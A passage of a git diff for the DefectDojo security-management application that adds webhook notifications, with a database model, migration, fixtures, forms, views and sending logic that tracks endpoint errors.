'msteams'), ('mail', 'mail'), ('webhooks', 'webhooks'), ('alert', 'alert')], default=('alert', 'alert'), max_length=33), + ), + migrations.AlterField( + model_name='notifications', + name='jira_update', + field=multiselectfield.db.fields.MultiSelectField(blank=True, choices=[('slack', 'slack'), ('msteams', 'msteams'), ('mail', 'mail'), ('webhooks', 'webhooks'), ('alert', 'alert')], default=('alert', 'alert'), help_text='JIRA sync happens in the background, errors will be shown as notifications/alerts so make sure to subscribe', max_length=33, verbose_name='JIRA problems'), + ), + migrations.AlterField( + model_name='notifications', + name='other', + field=multiselectfield.db.fields.MultiSelectField(blank=True, choices=[('slack', 'slack'), ('msteams', 'msteams'), ('mail', 'mail'), ('webhooks', 'webhooks'), ('alert', 'alert')], default=('alert', 'alert'), max_length=33), + ), + migrations.AlterField( + model_name='notifications', + name='product_added', + field=multiselectfield.db.fields.MultiSelectField(blank=True, choices=[('slack', 'slack'), ('msteams', 'msteams'), ('mail', 'mail'), ('webhooks', 'webhooks'), ('alert', 'alert')], default=('alert', 'alert'), max_length=33), + ), + migrations.AlterField( + model_name='notifications', + name='product_type_added', + field=multiselectfield.db.fields.MultiSelectField(blank=True, choices=[('slack', 'slack'), ('msteams', 'msteams'), ('mail', 'mail'), ('webhooks', 'webhooks'), ('alert', 'alert')], default=('alert', 'alert'), max_length=33), + ), + migrations.AlterField( + model_name='notifications', + name='review_requested', + field=multiselectfield.db.fields.MultiSelectField(blank=True, choices=[('slack', 'slack'), ('msteams', 'msteams'), ('mail', 'mail'), ('webhooks', 'webhooks'), ('alert', 'alert')], default=('alert', 'alert'), max_length=33), + ), + migrations.AlterField( + model_name='notifications', + name='risk_acceptance_expiration', + field=multiselectfield.db.fields.MultiSelectField(blank=True, choices=[('slack', 'slack'), ('msteams', 'msteams'), ('mail', 'mail'), ('webhooks', 'webhooks'), ('alert', 'alert')], default=('alert', 'alert'), help_text='Get notified of (upcoming) Risk Acceptance expiries', max_length=33, verbose_name='Risk Acceptance Expiration'), + ), + migrations.AlterField( + model_name='notifications', + name='scan_added', + field=multiselectfield.db.fields.MultiSelectField(blank=True, choices=[('slack', 'slack'), ('msteams', 'msteams'), ('mail', 'mail'), ('webhooks', 'webhooks'), ('alert', 'alert')], default=('alert', 'alert'), help_text='Triggered whenever an (re-)import has been done that created/updated/closed findings.', max_length=33), + ), + migrations.AlterField( + model_name='notifications', + name='scan_added_empty', + field=multiselectfield.db.fields.MultiSelectField(blank=True, choices=[('slack', 'slack'), ('msteams', 'msteams'), ('mail', 'mail'), ('webhooks', 'webhooks'), ('alert', 'alert')], default=[], help_text='Triggered whenever an (re-)import has been done (even if that created/updated/closed no findings).', max_length=33), + ), + migrations.AlterField( + model_name='notifications', + name='sla_breach', + field=multiselectfield.db.fields.MultiSelectField(blank=True, choices=[('slack', 'slack'), ('msteams', 'msteams'), ('mail', 'mail'), ('webhooks', 'webhooks'), ('alert', 'alert')], default=('alert', 'alert'), help_text='Get notified of (upcoming) SLA breaches', max_length=33, verbose_name='SLA breach'), + ), + migrations.AlterField( + model_name='notifications', + name='sla_breach_combined', + field=multiselectfield.db.fields.MultiSelectField(blank=True, choices=[('slack', 'slack'), ('msteams', 'msteams'), ('mail', 'mail'), ('webhooks', 'webhooks'), ('alert', 'alert')], default=('alert', 'alert'), help_text='Get notified of (upcoming) SLA breaches (a message per project)', max_length=33, verbose_name='SLA breach (combined)'), + ), + migrations.AlterField( + model_name='notifications', + name='stale_engagement', + field=multiselectfield.db.fields.MultiSelectField(blank=True, choices=[('slack', 'slack'), ('msteams', 'msteams'), ('mail', 'mail'), ('webhooks', 'webhooks'), ('alert', 'alert')], default=('alert', 'alert'), max_length=33), + ), + migrations.AlterField( + model_name='notifications', + name='test_added', + field=multiselectfield.db.fields.MultiSelectField(blank=True, choices=[('slack', 'slack'), ('msteams', 'msteams'), ('mail', 'mail'), ('webhooks', 'webhooks'), ('alert', 'alert')], default=('alert', 'alert'), max_length=33), + ), + migrations.AlterField( + model_name='notifications', + name='upcoming_engagement', + field=multiselectfield.db.fields.MultiSelectField(blank=True, choices=[('slack', 'slack'), ('msteams', 'msteams'), ('mail', 'mail'), ('webhooks', 'webhooks'), ('alert', 'alert')], default=('alert', 'alert'), max_length=33), + ), + migrations.AlterField( + model_name='notifications', + name='user_mentioned', + field=multiselectfield.db.fields.MultiSelectField(blank=True, choices=[('slack', 'slack'), ('msteams', 'msteams'), ('mail', 'mail'), ('webhooks', 'webhooks'), ('alert', 'alert')], default=('alert', 'alert'), max_length=33), + ), + migrations.CreateModel( + name='Notification_Webhooks', + fields=[ + ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), + ('name', models.CharField(default='', help_text='Name of the incoming webhook', max_length=100, unique=True)), + ('url', models.URLField(default='', help_text='The full URL of the incoming webhook')), + ('header_name', models.CharField(blank=True, default='', help_text='Name of the header required for interacting with Webhook endpoint', max_length=100, null=True)), + ('header_value', models.CharField(blank=True, default='', help_text='Content of the header required for interacting with Webhook endpoint', max_length=100, null=True)), + ('status', models.CharField(choices=[('active', 'Active'), ('active_tmp', 'Active but 5xx (or similar) error detected'), ('inactive_tmp', 'Temporary inactive because of 5xx (or similar) error'), ('inactive_permanent', 'Permanently inactive')], default='active', editable=False, help_text='Status of the incoming webhook', max_length=20)), + ('first_error', models.DateTimeField(blank=True, editable=False, help_text='If endpoint is active, when error happened first time', null=True)), + ('last_error', models.DateTimeField(blank=True, editable=False, help_text='If endpoint is active, when error happened last time', null=True)), + ('note', models.CharField(blank=True, default='', editable=False, help_text='Description of the latest error', max_length=1000, null=True)), + ('owner', models.ForeignKey(blank=True, help_text='Owner/receiver of notification, if empty processed as system notification', null=True, on_delete=django.db.models.deletion.CASCADE, to='dojo.dojo_user')), + ], + ), + ] diff --git a/dojo/engagement/signals.py b/dojo/engagement/signals.py index c2f09c9abbd..7b95d6fe87b 100644 --- a/dojo/engagement/signals.py +++ b/dojo/engagement/signals.py @@ -16,7 +16,7 @@ def engagement_post_save(sender, instance, created, **kwargs): if created: title = _('Engagement created for "%(product)s": %(name)s') % {"product": instance.product, "name": instance.name} create_notification(event="engagement_added", title=title, engagement=instance, product=instance.product, - url=reverse("view_engagement", args=(instance.id,))) + url=reverse("view_engagement", args=(instance.id,)), url_api=reverse("engagement-detail", args=(instance.id,))) @receiver(pre_save, sender=Engagement) diff --git a/dojo/fixtures/dojo_testdata.json b/dojo/fixtures/dojo_testdata.json index 62486cb90cf..ae550f8bf81 100644 --- a/dojo/fixtures/dojo_testdata.json +++ b/dojo/fixtures/dojo_testdata.json @@ -227,6 +227,7 @@ "url_prefix": "", "enable_slack_notifications": false, "enable_mail_notifications": false, + "enable_webhooks_notifications": true, "email_from": "no-reply@example.com", "false_positive_history": false, "msteams_url": "", @@ -2926,11 +2927,27 @@ "pk": 1, "model": "dojo.notifications", "fields": { - "product": 1, - "user": 2, - "product_type_added": [ - "slack" - ] + "product": null, + "user": null, + "template": false, + "product_type_added": "webhooks,alert", + "product_added": "webhooks,alert", + "engagement_added": "webhooks,alert", + "test_added": "webhooks,alert", + "scan_added": "webhooks,alert", + "scan_added_empty": "webhooks", + "jira_update": "alert", + "upcoming_engagement": "alert", + "stale_engagement": "alert", + "auto_close_engagement": "alert", + "close_engagement": "alert", + "user_mentioned": "alert", + "code_review": "alert", + "review_requested": "alert", + "other": "alert", + "sla_breach": "alert", + "risk_acceptance_expiration": "alert", + "sla_breach_combined": "alert" } }, { @@ -3045,5 +3062,35 @@ "dismissable": true, "style": "danger" } + }, + { + "model": "dojo.notification_webhooks", + "pk": 1, + "fields": { + "name": "My webhook endpoint", + "url": "http://webhook.endpoint:8080/post", + "header_name": "Auth", + "header_value": "Token xxx", + "status": "active", + "first_error": null, + "last_error": null, + "note": null, + "owner": null + } + }, + { + "model": "dojo.notification_webhooks", + "pk": 2, + "fields": { + "name": "My personal webhook endpoint", + "url": "http://webhook.endpoint:8080/post", + "header_name": "Auth", + "header_value": "Token secret", + "status": "active", + "first_error": null, + "last_error": null, + "note": null, + "owner": 2 + } } ] \ No newline at end of file diff --git a/dojo/forms.py b/dojo/forms.py index dde58a38b61..acf3546285b 100644 --- a/dojo/forms.py +++ b/dojo/forms.py @@ -72,6 +72,7 @@ JIRA_Project, Note_Type, Notes, + Notification_Webhooks, Notifications, Objects_Product, Product, @@ -2778,6 +2779,32 @@ class Meta: exclude = ["template"] +class NotificationsWebhookForm(forms.ModelForm): + class Meta: + model = Notification_Webhooks + exclude = [] + + def __init__(self, *args, **kwargs): + is_superuser = kwargs.pop("is_superuser", False) + super().__init__(*args, **kwargs) + if not is_superuser: # Only superadmins can edit owner + self.fields["owner"].disabled = True # TODO: needs to be tested + + +class DeleteNotificationsWebhookForm(forms.ModelForm): + id = forms.IntegerField(required=True, + widget=forms.widgets.HiddenInput()) + + def __init__(self, *args, **kwargs): + super().__init__(*args, **kwargs) + self.fields["name"].disabled = True + self.fields["url"].disabled = True + + class Meta: + model = Notification_Webhooks + fields = ["id", "name", "url"] + + class ProductNotificationsForm(forms.ModelForm): def __init__(self, *args, **kwargs): diff --git a/dojo/models.py b/dojo/models.py index 5048f30427f..308db965228 100644 --- a/dojo/models.py +++ b/dojo/models.py @@ -353,6 +353,13 @@ class System_Settings(models.Model): mail_notifications_to = models.CharField(max_length=200, default="", blank=True) + enable_webhooks_notifications = \ + models.BooleanField(default=False, + verbose_name=_("Enable Webhook notifications"), + blank=False) + webhooks_notifications_timeout = models.IntegerField(default=10, + help_text=_("How many seconds will DefectDojo waits for response from webhook endpoint")) + false_positive_history = models.BooleanField( default=False, help_text=_( "(EXPERIMENTAL) DefectDojo will automatically mark the finding as a " @@ -4015,12 +4022,14 @@ def set_obj(self, obj): NOTIFICATION_CHOICE_SLACK = ("slack", "slack") NOTIFICATION_CHOICE_MSTEAMS = ("msteams", "msteams") NOTIFICATION_CHOICE_MAIL = ("mail", "mail") +NOTIFICATION_CHOICE_WEBHOOKS = ("webhooks", "webhooks") NOTIFICATION_CHOICE_ALERT = ("alert", "alert") NOTIFICATION_CHOICES = ( NOTIFICATION_CHOICE_SLACK, NOTIFICATION_CHOICE_MSTEAMS, NOTIFICATION_CHOICE_MAIL, + NOTIFICATION_CHOICE_WEBHOOKS, NOTIFICATION_CHOICE_ALERT, ) @@ -4109,6 +4118,33 @@ def get_list_display(self, request): return list_fields +class Notification_Webhooks(models.Model): + class Status(models.TextChoices): + __STATUS_ACTIVE = "active" + __STATUS_INACTIVE = "inactive" + STATUS_ACTIVE = f"{__STATUS_ACTIVE}", _("Active") + STATUS_ACTIVE_TMP = f"{__STATUS_ACTIVE}_tmp", _("Active but 5xx (or similar) error detected") + STATUS_INACTIVE_TMP = f"{__STATUS_INACTIVE}_tmp", _("Temporary inactive because of 5xx (or similar) error") + STATUS_INACTIVE_PERMANENT = f"{__STATUS_INACTIVE}_permanent", _("Permanently inactive") + + name = models.CharField(max_length=100, default="", blank=False, unique=True, + help_text=_("Name of the incoming webhook")) + url = models.URLField(max_length=200, default="", blank=False, + help_text=_("The full URL of the incoming webhook")) + header_name = models.CharField(max_length=100, default="", blank=True, null=True, + help_text=_("Name of the header required for interacting with Webhook endpoint")) + header_value = models.CharField(max_length=100, default="", blank=True, null=True, + help_text=_("Content of the header required for interacting with Webhook endpoint")) + status = models.CharField(max_length=20, choices=Status, default="active", blank=False, + help_text=_("Status of the incoming webhook"), editable=False) + first_error = models.DateTimeField(help_text=_("If endpoint is active, when error happened first time"), blank=True, null=True, editable=False) + last_error = models.DateTimeField(help_text=_("If endpoint is active, when error happened last time"), blank=True, null=True, editable=False) + note = models.CharField(max_length=1000, default="", blank=True, null=True, help_text=_("Description of the latest error"), editable=False) + owner = models.ForeignKey(Dojo_User, editable=True, null=True, blank=True, on_delete=models.CASCADE, + help_text=_("Owner/receiver of notification, if empty processed as system notification")) + # TODO: Test that `editable` will block editing via API + + class Tool_Product_Settings(models.Model): name = models.CharField(max_length=200, null=False) description = models.CharField(max_length=2000, null=True, blank=True) @@ -4581,6 +4617,7 @@ def __str__(self): auditlog.register(Risk_Acceptance) auditlog.register(Finding_Template) auditlog.register(Cred_User, exclude_fields=["password"]) + auditlog.register(Notification_Webhooks, exclude_fields=["header_name", "header_value"]) from dojo.utils import calculate_grade, to_str_typed # noqa: E402 # there is issue due to a circular import @@ -4642,6 +4679,7 @@ def __str__(self): admin.site.register(GITHUB_Details_Cache) admin.site.register(GITHUB_PKey) admin.site.register(Tool_Configuration, Tool_Configuration_Admin) +admin.site.register(Notification_Webhooks) admin.site.register(Tool_Product_Settings) admin.site.register(Tool_Type) admin.site.register(Cred_User) diff --git a/dojo/notifications/helper.py b/dojo/notifications/helper.py index 5a7ccf0dc60..9acbf94d215 100644 --- a/dojo/notifications/helper.py +++ b/dojo/notifications/helper.py @@ -1,6 +1,9 @@ +import json import logging +from datetime import timedelta import requests +import yaml from django.conf import settings from django.core.exceptions import FieldDoesNotExist from django.core.mail import EmailMessage @@ -10,10 +13,19 @@ from django.urls import reverse from django.utils.translation import gettext as _ +from dojo import __version__ as dd_version from dojo.authorization.roles_permissions import Permissions from dojo.celery import app from dojo.decorators import dojo_async_task, we_want_async -from dojo.models import Alerts, Dojo_User, Notifications, System_Settings, UserContactInfo +from dojo.models import ( + Alerts, + Dojo_User, + Notification_Webhooks, + Notifications, + System_Settings, + UserContactInfo, + get_current_datetime, +) from dojo.user.queries import get_authorized_users_for_product_and_product_type, get_authorized_users_for_product_type logger = logging.getLogger(__name__) @@ -144,8 +156,9 @@ def create_notification_message(event, user, notification_type, *args, **kwargs) try: notification_message = render_to_string(template, kwargs) logger.debug("Rendering from the template %s", template) - except TemplateDoesNotExist: - logger.debug("template not found or not implemented yet: %s", template) + except TemplateDoesNotExist as e: + # In some cases, template includes another templates, if the interior one is missing, we will see it in "specifically" section + logger.debug(f"template not found or not implemented yet: {template} (specifically: {e.args})") except Exception as e: logger.error("error during rendering of template %s exception is %s", template, e) finally: @@ -170,6 +183,7 @@ def process_notifications(event, notifications=None, **kwargs): slack_enabled = get_system_setting("enable_slack_notifications") msteams_enabled = get_system_setting("enable_msteams_notifications") mail_enabled = get_system_setting("enable_mail_notifications") + webhooks_enabled = get_system_setting("enable_webhooks_notifications") if slack_enabled and "slack" in getattr(notifications, event, getattr(notifications, "other")): logger.debug("Sending Slack Notification") @@ -183,6 +197,10 @@ def process_notifications(event, notifications=None, **kwargs): logger.debug("Sending Mail Notification") send_mail_notification(event, notifications.user, **kwargs) + if webhooks_enabled and "webhooks" in getattr(notifications, event, getattr(notifications, "other")): + logger.debug("Sending Webhooks Notification") + send_webhooks_notification(event, notifications.user, **kwargs) + if "alert" in getattr(notifications, event, getattr(notifications, "other")): logger.debug(f"Sending Alert to {notifications.user}") send_alert_notification(event, notifications.user, **kwargs) @@ -309,6 +327,157 @@ def send_mail_notification(event, user=None, *args, **kwargs): log_alert(e, "Email Notification", title=kwargs["title"], description=str(e), url=kwargs["url"]) +def webhooks_notification_request(endpoint, event, *args, **kwargs): + from dojo.utils import get_system_setting + + headers = { + "User-Agent": f"DefectDojo-{dd_version}", + "X-DefectDojo-Event": event, + "X-DefectDojo-Instance": settings.SITE_URL, + "Accept": "application/json", + } + if endpoint.header_name is not None: + headers[endpoint.header_name] = endpoint.header_value + yaml_data = create_notification_message(event, endpoint.owner, "webhooks", *args, **kwargs) + data = yaml.safe_load(yaml_data) + + timeout = get_system_setting("webhooks_notifications_timeout") + + res = requests.request( + method="POST", + url=endpoint.url, + headers=headers, + json=data, + timeout=timeout, + ) + return res + + +def test_webhooks_notification(endpoint): + res = webhooks_notification_request(endpoint, "ping", description="Test webhook notification") + res.raise_for_status() + # in "send_webhooks_notification", we are doing deeper analysis, why it failed + # for now, "raise_for_status" should be enough + + +@app.task(ignore_result=True) +def webhook_reactivation(endpoint_id: int, *args, **kwargs): + endpoint = Notification_Webhooks.objects.get(pk=endpoint_id) + + # User already changed status of endpoint + if endpoint.status != Notification_Webhooks.Status.STATUS_INACTIVE_TMP: + return + + endpoint.status = Notification_Webhooks.Status.STATUS_ACTIVE_TMP + endpoint.save() + logger.debug(f"Webhook endpoint '{endpoint.name}' reactivated to '{Notification_Webhooks.Status.STATUS_ACTIVE_TMP}'") + + +@app.task(ignore_result=True) +def webhook_status_cleanup(*args, **kwargs): + # If some endpoint was affected by some outage (5xx, 429, Timeout) but it was clean during last 24 hours, + # we consider this endpoint as healthy so need to reset it + endpoints = Notification_Webhooks.objects.filter( + status=Notification_Webhooks.Status.STATUS_ACTIVE_TMP, + last_error__lt=get_current_datetime() - timedelta(hours=24), + ) + for endpoint in endpoints: + endpoint.status = Notification_Webhooks.Status.STATUS_ACTIVE + endpoint.first_error = None + endpoint.last_error = None + endpoint.note = f"Reactivation from {Notification_Webhooks.Status.STATUS_ACTIVE_TMP}" + endpoint.save() + logger.debug(f"Webhook endpoint '{endpoint.name}' reactivated from '{Notification_Webhooks.Status.STATUS_ACTIVE_TMP}' to '{Notification_Webhooks.Status.STATUS_ACTIVE}'") + + # Reactivation of STATUS_INACTIVE_TMP endpoints. + # They should reactive automatically in 60s, however in case of some unexpected event (e.g. start of whole stack), + # endpoints should not be left in STATUS_INACTIVE_TMP state + broken_endpoints = Notification_Webhooks.objects.filter( + status=Notification_Webhooks.Status.STATUS_INACTIVE_TMP, + last_error__lt=get_current_datetime() - timedelta(minutes=5), + ) + for endpoint in broken_endpoints: + webhook_reactivation(endpoint_id=endpoint.pk) + + +@dojo_async_task +@app.task +def send_webhooks_notification(event, user=None, *args, **kwargs): + + ERROR_PERMANENT = "permanent" + ERROR_TEMPORARY = "temporary" + + endpoints = Notification_Webhooks.objects.filter(owner=user) + + if not endpoints: + if user: + logger.info(f"URLs for Webhooks not configured for user '{user}': skipping user notification") + else: + logger.info("URLs for Webhooks not configured: skipping system notification") + return + + for endpoint in endpoints: + + error = None + if endpoint.status not in [Notification_Webhooks.Status.STATUS_ACTIVE, Notification_Webhooks.Status.STATUS_ACTIVE_TMP]: + logger.info(f"URL for Webhook '{endpoint.name}' is not active: {endpoint.get_status_display()} ({endpoint.status})") + continue + + try: + logger.debug(f"Sending webhook message to endpoint '{endpoint.name}'") + res = webhooks_notification_request(endpoint, event, *args, **kwargs) + + if 200 <= res.status_code < 300: + logger.debug(f"Message sent to endpoint '{endpoint.name}' successfully.") + continue + + # HTTP request passed successfully but we still need to check status code + if 500 <= res.status_code < 600 or res.status_code == 429: + error = ERROR_TEMPORARY + else: + error = ERROR_PERMANENT + + endpoint.note = f"Response status code: {res.status_code}" + logger.error(f"Error when sending message to Webhooks '{endpoint.name}' (status: {res.status_code}): {res.text}") + + except requests.exceptions.Timeout as e: + error = ERROR_TEMPORARY + endpoint.note = f"Requests exception: {e}" + logger.error(f"Timeout when sending message to Webhook '{endpoint.name}'") + + except Exception as e: + error = ERROR_PERMANENT + endpoint.note = f"Exception: {e}"[:1000] + logger.exception(e) + log_alert(e, "Webhooks Notification") + + now = get_current_datetime() + + if error == ERROR_TEMPORARY: + + # If endpoint is unstable for more then one day, it needs to be deactivated + if endpoint.first_error is not None and (now - endpoint.first_error).total_seconds() > 60 * 60 * 24: + endpoint.status = Notification_Webhooks.Status.STATUS_INACTIVE_PERMANENT + + else: + # We need to monitor when outage started + if endpoint.status == Notification_Webhooks.Status.STATUS_ACTIVE: + endpoint.first_error = now + + endpoint.status = Notification_Webhooks.Status.STATUS_INACTIVE_TMP + + # In case of failure within one day, endpoint can be deactivated temporally only for one minute + webhook_reactivation.apply_async(kwargs={"endpoint_id": endpoint.pk}, countdown=60) + + # There is no reason to keep endpoint active if it is returning 4xx errors + else: + endpoint.status = Notification_Webhooks.Status.STATUS_INACTIVE_PERMANENT + endpoint.first_error = now + + endpoint.last_error = now + endpoint.save() + + def send_alert_notification(event, user=None, *args, **kwargs): logger.debug("sending alert notification to %s", user) try: @@ -335,7 +504,6 @@ def send_alert_notification(event, user=None, *args, **kwargs): def get_slack_user_id(user_email): - import json from dojo.utils import get_system_setting @@ -390,7 +558,7 @@ def log_alert(e, notification_type=None, *args, **kwargs): def notify_test_created(test): title = "Test created for " + str(test.engagement.product) + ": " + str(test.engagement.name) + ": " + str(test) create_notification(event="test_added", title=title, test=test, engagement=test.engagement, product=test.engagement.product, - url=reverse("view_test", args=(test.id,))) + url=reverse("view_test", args=(test.id,)), url_api=reverse("test-detail", args=(test.id,))) def notify_scan_added(test, updated_count, new_findings=[], findings_mitigated=[], findings_reactivated=[], findings_untouched=[]): @@ -410,4 +578,4 @@ def notify_scan_added(test, updated_count, new_findings=[], findings_mitigated=[ create_notification(event=event, title=title, findings_new=new_findings, findings_mitigated=findings_mitigated, findings_reactivated=findings_reactivated, finding_count=updated_count, test=test, engagement=test.engagement, product=test.engagement.product, findings_untouched=findings_untouched, - url=reverse("view_test", args=(test.id,))) + url=reverse("view_test", args=(test.id,)), url_api=reverse("test-detail", args=(test.id,))) diff --git a/dojo/notifications/urls.py b/dojo/notifications/urls.py index dc91f7a04e2..6f4cba7bb64 100644 --- a/dojo/notifications/urls.py +++ b/dojo/notifications/urls.py @@ -7,4 +7,8 @@ re_path(r"^notifications/system$", views.SystemNotificationsView.as_view(), name="system_notifications"), re_path(r"^notifications/personal$", views.PersonalNotificationsView.as_view(), name="personal_notifications"), re_path(r"^notifications/template$", views.TemplateNotificationsView.as_view(), name="template_notifications"), + re_path(r"^notifications/webhooks$", views.ListNotificationWebhooksView.as_view(), name="notification_webhooks"), + re_path(r"^notifications/webhooks/add$", views.AddNotificationWebhooksView.as_view(), name="add_notification_webhook"), + re_path(r"^notifications/webhooks/(?P\d+)/edit$", views.EditNotificationWebhooksView.as_view(), name="edit_notification_webhook"), + re_path(r"^notifications/webhooks/(?P\d+)/delete$", views.DeleteNotificationWebhooksView.as_view(), name="delete_notification_webhook"), ] diff --git a/dojo/notifications/views.py b/dojo/notifications/views.py index 8a94d2ad7c5..6a2495330d7 100644 --- a/dojo/notifications/views.py +++ b/dojo/notifications/views.py @@ -1,15 +1,18 @@ import logging +import requests from django.contrib import messages from django.core.exceptions import PermissionDenied -from django.http import HttpRequest -from django.shortcuts import render +from django.http import Http404, HttpRequest, HttpResponseRedirect +from django.shortcuts import get_object_or_404, render +from django.urls import reverse from django.utils.translation import gettext as _ from django.views import View -from dojo.forms import NotificationsForm -from dojo.models import Notifications -from dojo.utils import add_breadcrumb, get_enabled_notifications_list +from dojo.forms import DeleteNotificationsWebhookForm, NotificationsForm, NotificationsWebhookForm +from dojo.models import Notification_Webhooks, Notifications +from dojo.notifications.helper import test_webhooks_notification +from dojo.utils import add_breadcrumb, get_enabled_notifications_list, get_system_setting logger = logging.getLogger(__name__) @@ -129,3 +132,295 @@ def get_scope(self): def set_breadcrumbs(self, request: HttpRequest): add_breadcrumb(title=_("Template notification settings"), top_level=False, request=request) return request + + +class NotificationWebhooksView(View): + + def check_webhooks_enabled(self): + if not get_system_setting("enable_webhooks_notifications"): + raise Http404 + + def check_user_permissions(self, request: HttpRequest): + if not request.user.is_superuser: + raise PermissionDenied + # TODO: finished access for other users + # if not user_has_configuration_permission(request.user, self.permission): + # raise PermissionDenied() + + def set_breadcrumbs(self, request: HttpRequest): + add_breadcrumb(title=self.breadcrumb, top_level=False, request=request) + return request + + def get_form( + self, + request: HttpRequest, + **kwargs: dict, + ) -> NotificationsWebhookForm: + if request.method == "POST": + return NotificationsWebhookForm(request.POST, is_superuser=request.user.is_superuser, **kwargs) + else: + return NotificationsWebhookForm(is_superuser=request.user.is_superuser, **kwargs) + + def preprocess_request(self, request: HttpRequest): + # Check Webhook notifications are enabled + self.check_webhooks_enabled() + # Check permissions + self.check_user_permissions(request) + + +class ListNotificationWebhooksView(NotificationWebhooksView): + template = "dojo/view_notification_webhooks.html" + permission = "dojo.view_notification_webhooks" + breadcrumb = "Notification Webhook List" + + def get_initial_context(self, request: HttpRequest, nwhs: Notification_Webhooks): + return { + "name": "Notification Webhook List", + "metric": False, + "user": request.user, + "nwhs": nwhs, + } + + def get_notification_webhooks(self, request: HttpRequest): + nwhs = Notification_Webhooks.objects.all().order_by("name") + # TODO: finished pagination + # TODO: restrict based on user - not only superadmins have access and they see everything + return nwhs + + def get(self, request: HttpRequest): + # Run common checks + super().preprocess_request(request) + # Get Notification Webhooks + nwhs = self.get_notification_webhooks(request) + # Set up the initial context + context = self.get_initial_context(request, nwhs) + # Add any breadcrumbs + request = self.set_breadcrumbs(request) + # Render the page + return render(request, self.template, context) + + +class AddNotificationWebhooksView(NotificationWebhooksView): + template = "dojo/add_notification_webhook.html" + permission = "dojo.add_notification_webhooks" + breadcrumb = "Add Notification Webhook" + + # TODO: Disable Owner if not superadmin + + def get_initial_context(self, request: HttpRequest): + return { + "name": "Add Notification Webhook", + "user": request.user, + "form": self.get_form(request), + } + + def process_form(self, request: HttpRequest, context: dict): + form = context["form"] + if form.is_valid(): + try: + test_webhooks_notification(form.instance) + except requests.exceptions.RequestException as e: + messages.add_message( + request, + messages.ERROR, + _("Test of endpoint was not successful: %(error)s") % {"error": str(e)}, + extra_tags="alert-danger", + ) + return request, False + else: + # User can put here what ever he want + # we override it with our only valid defaults + nwh = form.save(commit=False) + nwh.status = Notification_Webhooks.Status.STATUS_ACTIVE + nwh.first_error = None + nwh.last_error = None + nwh.note = None + nwh.save() + messages.add_message( + request, + messages.SUCCESS, + _("Notification Webhook added successfully."), + extra_tags="alert-success", + ) + return request, True + return request, False + + def get(self, request: HttpRequest): + # Run common checks + super().preprocess_request(request) + # Set up the initial context + context = self.get_initial_context(request) + # Add any breadcrumbs + request = self.set_breadcrumbs(request) + # Render the page + return render(request, self.template, context) + + def post(self, request: HttpRequest): + # Run common checks + super().preprocess_request(request) + # Set up the initial context + context = self.get_initial_context(request) + # Determine the validity of the form + request, success = self.process_form(request, context) + if success: + return HttpResponseRedirect(reverse("notification_webhooks")) + # Add any breadcrumbs + request = self.set_breadcrumbs(request) + # Render the page + return render(request, self.template, context) + + +class EditNotificationWebhooksView(NotificationWebhooksView): + template = "dojo/edit_notification_webhook.html" + permission = "dojo.change_notification_webhooks" + # TODO: this could be better: @user_is_authorized(Finding, Permissions.Finding_Delete, 'fid') + breadcrumb = "Edit Notification Webhook" + + def get_notification_webhook(self, nwhid: int): + return get_object_or_404(Notification_Webhooks, id=nwhid) + + # TODO: Disable Owner if not superadmin + + def get_initial_context(self, request: HttpRequest, nwh: Notification_Webhooks): + return { + "name": "Edit Notification Webhook", + "user": request.user, + "form": self.get_form(request, instance=nwh), + "nwh": nwh, + } + + def process_form(self, request: HttpRequest, nwh: Notification_Webhooks, context: dict): + form = context["form"] + if "deactivate_webhook" in request.POST: # TODO: add this to API as well + nwh.status = Notification_Webhooks.Status.STATUS_INACTIVE_PERMANENT + nwh.first_error = None + nwh.last_error = None + nwh.note = "Deactivate from UI" + nwh.save() + messages.add_message( + request, + messages.SUCCESS, + _("Notification Webhook deactivated successfully."), + extra_tags="alert-success", + ) + return request, True + + if form.is_valid(): + try: + test_webhooks_notification(form.instance) + except requests.exceptions.RequestException as e: + messages.add_message( + request, + messages.ERROR, + _("Test of endpoint was not successful: %(error)s") % {"error": str(e)}, + extra_tags="alert-danger") + return request, False + else: + # correct definition reset defaults + nwh = form.save(commit=False) + nwh.status = Notification_Webhooks.Status.STATUS_ACTIVE + nwh.first_error = None + nwh.last_error = None + nwh.note = None + nwh.save() + messages.add_message( + request, + messages.SUCCESS, + _("Notification Webhook updated successfully."), + extra_tags="alert-success", + ) + return request, True + return request, False + + def get(self, request: HttpRequest, nwhid: int): + # Run common checks + super().preprocess_request(request) + nwh = self.get_notification_webhook(nwhid) + # Set up the initial context + context = self.get_initial_context(request, nwh) + # Add any breadcrumbs + request = self.set_breadcrumbs(request) + # Render the page + return render(request, self.template, context) + + def post(self, request: HttpRequest, nwhid: int): + # Run common checks + super().preprocess_request(request) + nwh = self.get_notification_webhook(nwhid) + # Set up the initial context + context = self.get_initial_context(request, nwh) + # Determine the validity of the form + request, success = self.process_form(request, nwh, context) + if success: + return HttpResponseRedirect(reverse("notification_webhooks")) + # Add any breadcrumbs + request = self.set_breadcrumbs(request) + # Render the page + return render(request, self.template, context) + + +class DeleteNotificationWebhooksView(NotificationWebhooksView): + template = "dojo/delete_notification_webhook.html" + permission = "dojo.delete_notification_webhooks" + # TODO: this could be better: @user_is_authorized(Finding, Permissions.Finding_Delete, 'fid') + breadcrumb = "Edit Notification Webhook" + + def get_notification_webhook(self, nwhid: int): + return get_object_or_404(Notification_Webhooks, id=nwhid) + + # TODO: Disable Owner if not superadmin + + def get_form( + self, + request: HttpRequest, + **kwargs: dict, + ) -> NotificationsWebhookForm: + if request.method == "POST": + return DeleteNotificationsWebhookForm(request.POST, **kwargs) + else: + return DeleteNotificationsWebhookForm(**kwargs) + + def get_initial_context(self, request: HttpRequest, nwh: Notification_Webhooks): + return { + "form": self.get_form(request, instance=nwh), + "nwh": nwh, + } + + def process_form(self, request: HttpRequest, nwh: Notification_Webhooks, context: dict): + form = context["form"] + if form.is_valid(): + nwh.delete() + messages.add_message( + request, + messages.SUCCESS, + _("Notification Webhook deleted successfully."), + extra_tags="alert-success", + ) + return request, True + return request, False + + def get(self, request: HttpRequest, nwhid: int): + # Run common checks + super().preprocess_request(request) + nwh = self.get_notification_webhook(nwhid) + # Set up the initial context + context = self.get_initial_context(request, nwh) + # Add any breadcrumbs + request = self.set_breadcrumbs(request) + # Render the page + return render(request, self.template, context) + + def post(self, request: HttpRequest, nwhid: int): + # Run common checks + super().preprocess_request(request) + nwh = self.get_notification_webhook(nwhid) + # Set up the initial context + context = self.get_initial_context(request, nwh) + # Determine the validity of the form + request, success = self.process_form(request, nwh, context) + if success: + return 